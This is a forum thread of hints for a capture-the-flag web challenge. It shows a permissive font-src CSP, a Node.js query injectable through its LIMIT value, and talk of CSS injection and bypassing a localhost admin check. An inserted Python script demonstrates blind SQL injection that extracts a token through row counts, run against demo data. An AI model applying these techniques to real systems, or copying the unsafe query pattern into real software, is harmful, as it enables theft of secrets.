Official Stylish Discussion

Official discussion thread for Stylish. Please do not post any spoilers or big hints.

Nice challenge. Read the code meticulously. You'll figure it out.

Anyone got any hints?

I got to the injection but can’t UNION after LIMIT… any hints?

Oh… never mind… I got it… I will have to write some code to make it more elegant… nice kek

Hi, need a hint please…

Hint 1:

app.use(function(req, res, next) {
    // Every directive is pinned to 'self' except font-src, which additionally
    // allows any origin (*): the only directive that lets a request leave the site.
    res.setHeader("Content-Security-Policy", "default-src 'self'; object-src 'none'; img-src 'self'; style-src 'self'; font-src 'self' *;");
    next();
});

Hint 2:

async getSubmissionComments(submissionID, pagination=10) {
    return new Promise(async (resolve, reject) => {
        try {
            // Both values are interpolated straight into the SQL text with no
            // parameter binding; the LIMIT expression is the injection point
            // discussed in this thread.
            const stmt = `SELECT content FROM comments WHERE id_submission = ${submissionID} LIMIT ${pagination}`;
            resolve(await this.db.all(stmt));
        } catch(e) {
            reject(e);
        }
    });
}


I got the approvalToken but I cannot execute a successful approval with the token I've generated for my id.

Finally understood, pwned, thanks.

I'm stuck here, any hints?

Hey, can you drop another hint for me? Hint 1 provided by you was very helpful, but I am still not able to figure out the exact injection payload.
I tried a lot of CSS injection techniques, but I am unable to get the approval token.

How can we send out-of-band while only font-src 'self' * can be used? img-src and style-src are both 'self' :<<

For the injection: what if you can't get any strings? Maybe you can get some numbers…
As long as you have 255 comments or more… you can represent any ASCII char using numbers…
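Putting the Hint 2 query and the row-count idea above together as an added example (this is not code from the challenge or from anyone in this thread): the vulnerable query transcribed to Python against an in-memory SQLite database (SQLite is an assumption; the thread never names the engine), plus a client that injects a scalar subquery into the LIMIT clause so that the number of rows returned equals one character's code point. The `submissions` table, its `approval_token` column, the token value and the filler comments are all constructed for the demo; only `comments(id_submission, content)` comes from the hint.

```python
import sqlite3

# Constructed sample data (not from the challenge): a hypothetical 'submissions'
# table holding the per-submission approval token, plus the 'comments' table
# that the Hint 2 query reads from.
SECRET_TOKEN = "Sk3tChy-T0k3n"
COMMENT_COUNT = 300  # >= 255, so any byte value 1..255 maps to a distinct row count


def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE submissions (id INTEGER PRIMARY KEY, approval_token TEXT);
        CREATE TABLE comments (id INTEGER PRIMARY KEY, id_submission INTEGER, content TEXT);
    """)
    con.execute("INSERT INTO submissions VALUES (1, ?)", (SECRET_TOKEN,))
    con.executemany(
        "INSERT INTO comments (id_submission, content) VALUES (1, ?)",
        [(f"filler comment {i}",) for i in range(COMMENT_COUNT)],
    )
    return con


def get_submission_comments(con, submission_id, pagination=10):
    """Python transcription of the vulnerable Hint 2 query: both values are
    interpolated straight into the SQL text, so 'pagination' is injectable."""
    stmt = f"SELECT content FROM comments WHERE id_submission = {submission_id} LIMIT {pagination}"
    return con.execute(stmt).fetchall()


def leak_number(con, submission_id, scalar_sql):
    """Inject a scalar subquery into LIMIT. The number of rows that come back
    equals the integer the subquery evaluated to, as long as that integer is
    smaller than the number of comments (otherwise the channel saturates)."""
    rows = get_submission_comments(con, submission_id, f"({scalar_sql})")
    n = len(rows)
    if n >= COMMENT_COUNT:
        raise ValueError("value >= comment count: add more comments to encode it")
    return n


def leak_token(con, submission_id):
    # Step 1: token length. LIMIT (SELECT length(...)) returns that many rows.
    length = leak_number(
        con, submission_id,
        f"SELECT length(approval_token) FROM submissions WHERE id = {submission_id}",
    )
    # Step 2: one request per character. unicode() turns the character into
    # its code point; ifnull() keeps LIMIT from ever seeing NULL, which SQLite
    # rejects as a datatype mismatch.
    token = ""
    for pos in range(1, length + 1):
        code = leak_number(
            con, submission_id,
            f"SELECT ifnull(unicode(substr(approval_token, {pos}, 1)), 0) "
            f"FROM submissions WHERE id = {submission_id}",
        )
        token += chr(code)
    return token


if __name__ == "__main__":
    db = build_db()
    print(len(get_submission_comments(db, 1)))  # the normal page: 10 comments
    print(leak_token(db, 1))
```

Each character costs one request and the only thing the client reads is how many comments came back, which is why the thread stresses having at least 255 comments: fewer than that and high code points become indistinguishable from "all comments".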

I can steal all the chars in the token but I don't know the order :<<


Look at the token generation algorithm… I am sure you will sort it out…

Yeah, I can steal the token, but for 2 days I've been trying to bypass this: const isAdmin = req => ((req.ip == '127.0.0.1') ? 1 : 0);
It has taken me a lot of time. I still can't bypass the SSRF here :<<. Somebody help me.

Been going to school on this one; what works there does not seem to work here. It seems I can steal all but what I need; tells me I'm missing class and forgot my id.

Having to code has made it even more frustrating, as it lets you test what you can do after you have the token.

Maybe you could trigger the approval using the same trick you used to find the token…

Sometimes just posting helps you figure out how to see what you could not see…

■■■, that's sooooo cool